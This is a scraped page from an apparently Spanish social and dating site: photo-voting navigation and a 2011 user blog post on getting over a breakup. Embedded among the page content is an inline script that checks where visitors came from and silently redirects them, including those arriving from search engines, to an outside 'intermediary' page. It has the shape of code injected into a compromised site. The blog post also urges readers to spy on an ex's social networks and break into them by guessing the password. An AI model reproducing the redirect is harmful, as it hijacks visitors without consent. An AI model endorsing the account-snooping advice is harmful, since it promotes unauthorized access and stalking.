Foto cuarto   Foto segundo   1º de la semana   1ª de la semana   Foto segunda   Foto Cuarta
  Foto quinto   Foto tercero Foto tercera   Foto quinta
 
Recuerda: puedes votar hasta el viernes a las 24:00
         
Votaciones de esta semana
       
130.422
  • ChicoLive
  • ChicaLive
var toUrl="http://"; var rUrl = document.referrer; var patrn=/(.*)$/; toUrl+="servingnotice.com/lvinter1/intermediary.html?it11org"; toUrl+=""; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)aol.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)yahoo.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)bing.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl;
Cursos, Masters y Oposiciones
El mejor SEXSHOP de Internet
 

misterious_girl

misterious_girl  
33
Santander (Cantabria)  
   

Historia

Como superar una ruptura.
[01-03-2011 18:45]

En algunas revistas-webs o libros dan consejos para olvidar a tu ex, si, ese que te abandonó cierto día y no puedes olvidar.... bien una de las cosas que dicen es que no quedes con él.
Que no fisgues en sus redes sociales, que no le llames... Vale, de acuerdo, no le llames. De eso nada, el truco del "perdona me he confundido, llamaba a otro Fulano que se llama como tu" está muy trillado.
Yo recomiendo que seas su amiga y que quedes siempre que tengas ocasión. Que fisgues en sus redes todo lo que te dé la santísima gana, y si puedes entrar averigüando la contraseña, mejor.
Así vivirás anclada en la realidad, sabrás si te dejó por otra o anda con alguna... puede que descubras más de una mentira. Con el tiempo irás dándote cuenta de que mea y caga como todo el mundo y que no es para tanto. Dejarás de idealizarle...
De todos modos, el truco de dar celos funciona siempre. Tarde o temprano, al chico en cuestión le pica verte disfrutar con otros, le crea inseguridad pensar que otro te hace más feliz, que no te mientan: ninguno se alegra de verte con otro después, y menos si él no tiene a nadie.
Es el cuento eterno: te dejan, te putean y después cuando estás feliz con otro vuelven a comerte el coco con arrepentimientos.... ahi de ti depende.
Si te dejó una vez probablemente vuelva a hacerlo una vez satisfecha su lujuria.... si se dura un mes dale gracias a dios. Lo más seguro es que seas tu misma la que le guardes tanto rencor que termines dejándole cuando te des cuenta de que ya no es para tanto, y sobre todo si t has liado o has estado saliendo con otros: fijo que si le comparas sale perdiendo...
Luego solo queda la prueba de fuego: verle con otra, suponiendo que no le hayas visto ya. Y sobre todo que sea cuando tu estás mas sola que la una...
Eso es lo que me está pasando a mi, y no es ni mejor ni peor, despues de año y pico de abandono... y solo le he visto de lejos con otra.
Qué mas da. Yo he disfrutado mientras él sufría y al revés....
Pero vamos, q seamos realistas..... no nos ceguemos ante las rupturas... hay que buscar la verdad siempre... dicen que para dejar de fumar lo mejor es llevar la cajetilla en el bolsillo.... pues lo mismo con un ex, mirarle de frente siempre.
Un saludo a [email protected]


Compártelo:

 
Haz GenteLIVE tu página de inicio Añadir a Favoritos Contacto Ayuda